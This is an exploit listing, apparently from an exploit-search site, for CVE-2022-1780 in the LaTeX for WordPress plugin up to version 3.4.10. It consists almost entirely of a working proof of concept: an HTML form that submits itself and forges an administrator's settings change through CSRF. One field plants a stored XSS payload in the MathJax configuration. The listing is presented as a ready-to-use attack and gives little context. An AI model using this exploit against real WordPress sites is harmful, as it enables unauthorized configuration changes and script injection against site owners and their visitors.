Exploit for LaTeX for WordPress <= 3.4.10 - Arbitrary Settings Update via CSRF to Stored XSS CVE-2022-1780

Name: Exploit for LaTeX for WordPress <= 3.4.10 - Arbitrary Settings Update via CSRF to Stored XSS CVE-2022-1780
Rating: 5 (85 reviews)

2022-05-23 | CVSS 3.5

## https://sploitus.com/exploit?id=WPEX-ID:DD22EA1E-49A9-4B06-8DD9-BB224110F98A
<form id="test" action="https://example.com/wp-admin/options-general.php?page=latex%2Flatex-admin.php" method="POST">
    <input type="text" name="latex_img_server" value="http://l.wordpress.com/latex.php?bg=ffffff&fg=000000&s=0&latex=">
    <input type="text" name="latex_img_custom_server" value="http://chart.apis.google.com/chart?cht=tx&chl=">
    <input type="text" name="latex_imgcss" value="">
    <input type="text" name="mathjax_server" value="custom">
    <input type="text" name="mathjax_custom_server" value="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML">
    <input name="latex_mathjax_config" type="text" value="</textarea><img src onerror=alert(/XSS/)>">
    <input type="text" name="update_latex_option" value="Update LaTeX Options">
</form>
<script>
    document.getElementById("test").submit();
</script>